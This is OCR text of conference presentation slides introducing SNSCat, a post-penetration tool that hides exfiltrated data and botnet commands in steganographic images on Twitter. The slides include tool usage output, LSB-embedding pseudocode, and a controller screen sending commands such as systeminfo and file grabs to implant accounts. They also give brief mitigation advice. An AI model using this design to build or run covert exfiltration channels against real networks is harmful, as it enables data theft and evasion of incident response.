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Topics Covered 



What is SNSCat 


Why SNSCat Matters 
Module Overview & Demo 
Mitigation Strategies 
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"Post penetration covert channel tool designed to 

hide communication over social media sites and 

confuse incident responders" 



m r 














Did you miss a key detail... 

SNSCat exploits both the technology and incident responder 















You said post penetration...isn't the access assumption a cheat? 

Cobalt & Armitage are amazing projects that can leverage our project 
(Check it out at http://www.advancedpentest.com) 
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Naive Exfiltration 





Weaknesses 

• Looks suspicious 

• Newer technology looks for this type of exfiltration 

• Network security infrastructure can log session 

• Attacker gives away IP 
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SNSCat Exfiltration 






Weaknesses Exploited 

• Data Loss Prevention vs encrypted/stego'd data 

• Security infrastructure logs valid social media site traffic 

• Attacker never sees victim 

• Incident responders won't want to touch this 

• "More of a compliance issue" attitude 
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Information Security Paradigm 
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What happens when Knowledge is 

Removed? ? i If 
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Knowledge 



• Starts by identifying artifact of the 


attacker 
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Signature 

Response 

Prevention 


- Clues the system has been compromised 

- Connection data (IP, DNS, time, duration, count) 
— Unknown Traffic that is "very unusual..." 

• Develop mechanism to detect footprint 

• Search enterprise, mitigate discoveries 

• Release methods to prevent reoccurrence 
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Covert Channels via Stego & Crypto 
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Covert Channel 

- Protocol Abuse 

- Storage or timing based 

- Steganography = Art of hiding data in carrier 
images 

- Pretty much anywhere data can fit 
Cryptography 

- Plaintext, Encrypted Text 
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Graphical Overview 




























GUI/CLI Demo 
















Modules & Concepts 
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mbprols-MacBook-Pro:snscat2 mbprol$ java -jar XOrCrypto.jar 
Usage: XOr.jar 

-e <filepath> <keypath> [output file] 

-eS <message byte values> <key> 

-d <filepath> <keypath> [output file) 

-dS <cipherText byte values> <key> 

-g <Key Byte Size> [output file] 

-gS <Key Byte Size> 
mbprols-MacBook-Pro:snscat2 mbprol$ 
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mbprols-MacBook-Pro:snscat2 mbprol$ java -jar XOrCrypto.jar -g 10 secretkey 
mbprols-MacBook-Pro:snscat2 mbprol$ hexdump secretkey 


0000000 e6 ff 36 b3 d4 8f 18 c2 9d d7 
000000a 
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Q: How do you deal with compression? 


A: It depends! 
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Social API Module 

W O O _tnsc*t 2 — b ash — 84x23 

mbprols-MacBook-Pro:snscat2 mbproli java -jar TwitterAPI.jar -h 
Usage: twitter.jar 

-upload <username> <password> <file path> <status msg> 
-downloadall <username> <download path> 

-downloadnew <username> <download path> 

-getallfilenames <username> 

-getnewtilenames <username> 

-reinventory <image link> <download path> <Twitter Handle> 
-new <filename> <username> 
mbprols-MacBook-Pro:snscat2 mbproli 




Social API Module 


mbprols-MacBook-Pro:snscat2 nbprols java -jar TwitterAPI.jar -downloadall Naturel0verl21 ./ 
1 


nbprols-MacBook 

483068539.jpg 

483068564.jpg 

485092307.jpg 

485234569.jpg 

485234670.jpg 

nbprols-MacBook 


Pro:snscat2 nbprols Is 
485242079.jpg 
485242185.jpg 
485245500.jpg 
485257662.jpg 
489309766.jpa 
-Pro:snscat2 mbprolS | 


490285734.png 
490285799.png 
490285855.png 
490285906.png 
490285992.png 


490286035.png 
501713039.png 
501713119.png 
NatureL0verl21.txt 
TwitterAPI.jar 
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Social API Module 
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irbprols-MacBook-Pro: snscat2 

501713119.png 

501713039.png 

490286035.png 

490286035.png 

490285992.png 

490285906.png 

490285855.png 

490285799.png 

490285734.png 

489309766.jpg 

485257662.jpg 

48S245500.jpg 

485242185.jpg 

485242079.jpg 

485234670.jpg 

485234569.jpg 

485092307.jpg 

483068564.jpg 

483068539.jpg 

mbprols-MacBook-Pro:snscat2 


mbprolS cat NatureL0verl21.txt 


mbprolS | 




Automating SNSCat 


Agent 


Botnet Functionality 

Basics: 

- Controller 

- Dropper/Agent 

- Communication Protocol 

Fully Modular 

- Downloader, Uploader, Parser Modules 

- Establish Connected Agents 

- Exchange Commands, View Updates 
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Forensics? 
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Mitigation Strategies 


Accept that network-based Data Loss Prevention has limits 
Separate non-critical assets from critical assets 
Move beyond the boundary 
Image Compression/Alteration 
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• Alg behind LSB 

• • Convert Source Data to bytes 

• • data[] = convertSourceToBytes(); 

• • Determine indices to place each bit 

• • Populate embed location 

• • embedSize = sizeof(source data bytes) * 8; 

• • indexLoc[] = new int[embedSize]; 

• • locations!] = populateLocations(indexLoc, 
carrierFileSize); 

• • Embed, re-compose, upload 
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Hidden Slides (Backup) 





I 


E Hidden Slide (Embed Bits) 


Embed Bits 
position = 0; 
for(i; embedSize...) 

{ 

currByte = embedData[i]; 
arr[0] = (currByte »> 7) &1; 

arr[7] = (currByte »> 0) & 1; 
for(j < 8) 

{ 

indexToMod = locations[position++]; 
carrierByteToMod = carrier[indexToMod]; 
carrierByte_LSB_Cleared = carrierByteToMod & OxFE; 

newByte_LSB = (byte)(carrierByte_LSB_Cleared | arr[j]; 

carrier[indexToModify] = newByte_LSB; 

} 


} 

• Extraction: populate locations > extract bits > shift bits > save byte 

• Re-Composing: carrier image > fragment > compress > Source Data 
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Added Accounts 


Remove All Accounts 


[Twitter] snscatjmplaiitl 
[Twitter] snscat _iniplaiit2 
[Twitter] snscat _implaiit3 


ServerS ocket 

8080 Close 


Disconnect All 

Number of Connected Agents: 0 

Downloader A ctivation Update Interval 
1 SecT Min C Hr 


Import List 


Export List 


Suspend Timer Update Timer 


Number of Connected Clients: 3 


Next Update at: Not Started 


Send...Network ...CQ,m,man,dt,o,,Im 


Select Folder 

F: \Blackhat\FINAL\StegoMaker Workspace\Download 

Select Folder 

F: \Blackhat\FINAL\StegoMaker Workspace\Client Registration 

Select Folder 

F: \Blackhat\FINAL\StegoMakerWorkspace\Acct Sync 

Select Folder 

F: \Blackhat\FINAL\StegoMakerWorkspace\Parse 

Select Folder 

F: \Blackhat\FINAL\5tegoMakerWorkspace\Connection Data 


Connectivity Status 


Drop Box Info: 

Complete 

External Modules: 

Complete 

Socket Connection: 

Open 

Update Interval: 

Established 

Downloader Module: 

Connected 

Uploader Module: 

Connected 

Parser Module: 

Connected 


OB 


OB 


None Selected Commands 
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snscatBroadcast 

Broadcast PW: 

123456 

Acct Type: 

Twitter.com 

V 


Add Command 


Browse ] Carrier Image: joMakerWorkspace\JARs\Upload\CanvasFiles.png Tag: Awesome Day Friday 


I Remove 

Cmd: 

0 v Parameters: 

systeminfo 

Response: 

Implant Account v 






Remove 

Cmd: 

0 v Parameters: 

dir /sc:/ 

Response: 

Implant Account v 






Remove 

Cmd: 

[2 v Parameters: 

c:\Special Documents\* 

Response: 

Implant Account v 


Remove All 

Carrier Size: 0 B Command(s) Size: 0 B 
Command Recipients 


Br o a d c a st Ac co u r it 
[Twitter] snscat Jniplaiitl 
[Twitter] snscat_implant2 
[Twitter] snscat _implarit3 


Network Traffic 


Send Network Command to Implants 


Select OB OB 1 1 None Selected Commands 
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Upcoming Features 


PKI to validate commands only sent from the 
Controller 

Larger dispersal (Twitter, Facebook, Youtube) 
Embed stego in Audio and Video Files 
Exchange Large File Types 
Explore Smart Phone platforms 
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Hidden Slides (Importing Modules) 


• Building Modules 

• • GUI/CU Conventions 

• • Not really any specifics 

• • The sky is the limit 







Hidden Slides (Modules) 
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Crypto Module Conventions 

• -e <filename> <keyfile> -- encrypts file with 
key 

• -d <filename> <keyfile> -- decrypts file with 
key 

• -g -- generates key(s) and stores in TMP 

• -h -- help 
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Hidden Slides (Additional Modules) 



• Depends on what the audience would like to 




